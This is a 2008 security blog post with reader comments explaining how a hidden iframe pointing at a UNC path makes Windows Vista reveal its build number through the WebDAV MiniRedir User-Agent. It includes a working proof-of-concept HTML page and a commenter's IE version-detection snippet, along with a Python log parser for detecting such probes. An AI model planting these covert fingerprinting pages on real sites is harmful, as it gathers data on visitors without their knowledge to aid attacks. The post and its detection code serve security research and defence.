Monday, May 05, 2008

[ Vista OS Version Trick ]

I found out about this nifty little trick while messing around with UNC notation in the browser. For those wondering, I'll blog about the second day of Blue Hat some other time. Still mentally recovering from the limo races ;)


So, to start this out, I discovered something interesting about UNC notation. You can specify a port number. For example, if I did this in the browser:

\\1.2.3.4:80

It will actually try to connect to port 80, but it does some strange stuff when it tries that. Since Vista doesn't know exactly WHAT service is running on port 80, it sends a couple of interesting requests to it. First it sends an OPTIONS HTTP request to that port. Then, if it gets an intelligible response, it sends some PROPFIND requests. Weird. Here are a couple of examples of what it looks like from my Apache server logs:

8.7.6.5 - - [30/Apr/2008:16:35:23 -0500] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6000"

5.4.3.2 - - [29/Apr/2008:16:21:38 -0500] "PROPFIND / HTTP/1.0" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6001"

And here is an actual HTTP request:

PROPFIND / HTTP/1.1
Content-Length: 0
Depth: 0
translate: f
User-Agent: Microsoft-WebDAV-MiniRedir/6.0.6000
Host: 1.2.3.4
Proxy-Connection: Keep-Alive

The thing we want to focus on here is the User-Agent header. It invariably says "Microsoft-WebDAV-MiniRedir/" but the version number included after the slash differs depending on what version of Vista the user is running.


Version 6.0.6000 is Vista Ultimate with no service pack and 6.0.6001 is Vista Ultimate with SP1 installed. I haven't had a chance to test other versions. So if we have a page like this:

<html>
<head>
<script>
// Inject the iframe after the page has rendered. The src is the UNC path
// \\1.2.3.4:80; each backslash is doubled because this is a JavaScript string.
function f() {
document.getElementById("shady").innerHTML = "<iframe name='s' id='s' src='\\\\1.2.3.4:80' width='40%' height='300'></iframe>";
}
setTimeout(f, 500);
</script>
</head>
<body>
Nothing shady going on here....<br><br>
<div id="shady"></div>
</body>
</html>

We can force a Vista user to give up their version number just by visiting our page: the MiniRedir User-Agent shows up in our server log as soon as the iframe loads.


Obviously we can make the iframe invisible so the error message doesn't show up for the victim.

So this, in and of itself, is not a system-compromising attack, but the more information we can glean from the target the more ammunition we have as attackers. By the way, this does not work in XP.
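The same observation is useful from the server side: a web server operator can spot these probes in the access log and see what the User-Agent gives away. The following is an added example, not code from the original post. It parses Apache combined-format lines like the ones quoted above, flags requests carrying the Microsoft-WebDAV-MiniRedir User-Agent, and maps the build number to a Vista release using only the two values the post states; the sample log lines are constructed, and the KNOWN_BUILDS table is an assumption limited to what the post says.

```python
import re
from collections import defaultdict
from typing import Optional

# Apache combined log format, matching the author's excerpts above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
UA_RE = re.compile(r'Microsoft-WebDAV-MiniRedir/(?P<ver>\d+\.\d+\.\d+)')

# Build-to-release mapping as stated in the post; any other build is reported as unknown.
KNOWN_BUILDS = {
    "6.0.6000": "Windows Vista (no service pack)",
    "6.0.6001": "Windows Vista SP1",
}

def classify_miniredir(line: str) -> Optional[dict]:
    """Return a finding for a WebDAV MiniRedir request line, or None otherwise."""
    m = LOG_RE.match(line)
    ua = UA_RE.search(m.group("ua")) if m else None
    if ua is None:
        return None
    build = ua.group("ver")
    return {"ip": m.group("ip"), "method": m.group("method"), "build": build,
            "os": KNOWN_BUILDS.get(build, "unknown build")}

def by_source(lines) -> dict:
    """Group findings per client IP so the OPTIONS -> PROPFIND probe sequence is visible."""
    out = defaultdict(lambda: {"build": None, "os": None, "methods": []})
    for f in filter(None, map(classify_miniredir, lines)):
        entry = out[f["ip"]]
        entry["build"], entry["os"] = f["build"], f["os"]
        entry["methods"].append(f["method"])
    return dict(out)

# Constructed sample lines: the two from the post plus a browser hit and an unlisted build.
SAMPLE_LOG = [
    '8.7.6.5 - - [30/Apr/2008:16:35:23 -0500] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6000"',
    '8.7.6.5 - - [30/Apr/2008:16:35:24 -0500] "PROPFIND / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6000"',
    '5.4.3.2 - - [29/Apr/2008:16:21:38 -0500] "PROPFIND / HTTP/1.0" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6001"',
    '10.0.0.9 - - [29/Apr/2008:16:22:01 -0500] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0)"',
    '10.0.0.7 - - [29/Apr/2008:16:23:45 -0500] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6002"',
]

if __name__ == "__main__":
    for ip, info in by_source(SAMPLE_LOG).items():
        print(ip, info["build"], info["os"], " -> ".join(info["methods"]))
```

A MiniRedir User-Agent on a plain web server is a strong hint that the client was steered to a UNC path rather than typing a URL, which is the thing worth alerting on.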


5 Comments:

At 4:02 PM, Anonymous Anonymous said...

Grab your ankles, Vista. Nice trick.

Added your RSS to my feeds at https://kinqpinz.info/feeds/.

At 1:24 PM, Blogger Rob said...

Thanks meathive

At 10:23 AM, Anonymous Anonymous said...

<BODY behavior:url(#default#clientCaps)" ID="oClientCaps">

var sVersion = oClientCaps.getComponentVersion ("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
alert("getComponentVersion says you are running Internet Explorer " + sVersion + ".");

At 11:10 AM, Blogger Rob said...

Very cool, anonymous. I like that. One correction though:

<BODY style="behavior:url(#default#clientCaps)" ID="oClientCaps">

At 12:48 PM, Blogger est said...

nice trick!
